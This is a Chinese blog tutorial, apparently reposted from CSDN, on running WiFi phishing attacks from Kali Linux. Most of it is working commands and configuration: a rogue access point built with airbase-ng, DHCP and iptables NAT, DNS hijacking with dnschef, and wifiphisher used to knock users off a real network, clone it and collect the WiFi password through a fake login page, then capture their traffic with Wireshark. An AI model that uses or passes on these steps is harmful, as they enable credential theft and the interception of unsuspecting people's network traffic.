电子证据 利用Kali进行wifi钓鱼实战详细教程

电子证据 利用Kali进行wifi钓鱼实战详细教程

一、 Kali系统安装和必要软件安装:

  • 1.Kali最新版可以来我这儿拿外置驱动和光盘装,目测用U盘装最新版有些问题,比较麻烦。
  • 2.Kali更新源配置(没网络可以连接Wifi):shell 运行 gedit /etc/apt/sources.list #指打开 /etc/apt目录下的sources.list文件
    然后复制:

    #中科大kali源

    deb http://mirrors.ustc.edu.cn/kali sana main non-free contrib

    deb http://mirrors.ustc.edu.cn/kali-security/ sana/updates main contrib non-free

    deb-src http://mirrors.ustc.edu.cn/kali-security/ sana/updates main contrib non-free

    #阿里云kali源

    deb http://mirrors.aliyun.com/kali sana main non-free contrib

    deb http://mirrors.aliyun.com/kali-security/ sana/updates main contrib non-free

    deb-src http://mirrors.aliyun.com/kali-security/ sana/updates main contrib non-free
    然后保存即可。关闭后,再输入:apt-get update && apt-get dist-upgrade,回车。等待更新。

  • 3.更新源后,输入:apt-get install isc-dhcp-server,回车。如出现依赖关系,把依赖关系的软件卸载即可(命令:apt-get remove xxx)xxx代表软件名。

二、利用kali建立钓鱼wifi:

建立热点

工具:isc-dhcp-server ;Aircrack-ng套件;iptables

isc-dhcp-server上面已装,其他的kali自带。

shell输入:gedit /etc/dhcp/dhcpd.conf #意思同上,gedit是打开文件命令,如没有这个文件,则创建。
写入如下内容:
authoritative;

default-lease-time 700;
max-lease-time 8000;

subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;

option domain-name-servers 10.0.0.1;

range 10.0.0.10 10.0.0.100;

}

这里以10.0.0.1作为网关和dns服务器地址。

然后我们处理无线网卡

ifconfig wlan1 down #wlan1是你的网卡 这里意思是关闭wlan1网卡
iwconfig wlan1 mode monitor #设置wlan1网卡为监听模式
ifconfig wlan1 up #打开wlan1网卡
airmon-ng start wlan1 #启动wlan1网卡的监听模式

上述命令可以防止出现:Error: Got channel -1, expected a value > 0.

然后用airbase建立热点
airbase-ng -e Fishing -c 11 wlan1 #创建名为Fishing的热点,Fishing 自己改。

热点的网络流量会被虚拟到at0这块网卡上面

ifconfig at0 up #启用at0这块网卡
ifconfig at0 10.0.0.1 netmask 255.255.255.0 #在at0上配置10.0.0.1的ip地址及24位掩码
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 #添加路由
echo 1 > /proc/sys/net/ipv4/ip_forward #打开ip转发

dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
service isc-dhcp-server start #开启 dhcp

然后可以试着用手机连接,应该可以连上但上不了网

于是配置NAT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE #对eth0进行源nat
iptables -A FORWARD -i wlan1 -o eth0 -j ACCEPT #把无线网卡流量转发到有线网卡(或者什么能上网的网卡)上面
iptables -A FORWARD -p tcp –(两个-)syn -s 10.0.0.0/24 -j TCPMSS –(两个-)set-mss 1356 #修改最大报文段长度

注意那第三个命令调整MSS,不加后果很严重(我就一直死在这里)

(这里可能还是DNS错误,请看后文中的dns代理服务器搭建)

劫持DNS

工具:dnschef

过程:

dnschef -i 10.0.0.1 –nameserver 61.128.128.68 #以ip 10.0.0.1建立dns,对于所有请求转发到61.128.128.68进行解析。

然后就可以用wireshark等工具抓包啦!

三、wifiphisher:

(要买一个无线网卡,淘宝23元一个,团购免邮费)

这是一个wifi攻击脚本,详细介绍地址:https://github.com/sophron/wifiphisher

先,我们来下载wifiphisher:

在shell框里输入命令:
git clone https://github.com/sophron/wifiphisher.git

等待下载完毕,然后你可以在你下载的目录下看见wifiphisher这个文件夹。然后在这个文件夹运行 shell.

输入命令:python bin/wifiphisher
如果是第一次运行脚本的话,它可能会出现提示安装hostpad的信息,键入Y继续安装即可。

完成的时候,再次运行Wifiphisher脚本。

这次将运行8080和433端口的Web服务器,然后开始搜索附近的Wi-Fi网络。

等待搜索完成,我们会发现一系列Wi-Fi网络名。

然后按Ctrl+C 选择攻击的wifi

出现1、2、3三种模式,这三种模式代表发送不同的验证页面给连接的用户,具体的页面文件在wifiphisher目录下的 attack page中。也可以自己写一个。

敲下回车,Wifiphisher会显示正在使用的界面,还有正被攻击及复制的AP所在的SSID。

然后已连接件被攻击wifi的用户会被强制断开,wifiphisher会copy这个被攻击的wifi,做一个伪装wifi(原理就如第二步),然后断开的用户将会再搜索到的是这个伪装wifi,当他们连接这个wifi时会接受到一个验证页面(3种模式有3种不同的页面),然后会要求用户输入密码,当用户输入密码提交后,你将会看见这个密码。

我在这里就失败了…我的情况是:当用户提交的密码给我后,他们不是连上我的伪装wifi,而是wifiphisher直接关掉了…原因不明…

如果他们连上这个伪装wifi,你就可以用wireshark等工具进行抓包啦~~!

猜你喜欢

转载自blog.csdn.net/alextan_/article/details/51316817
今日推荐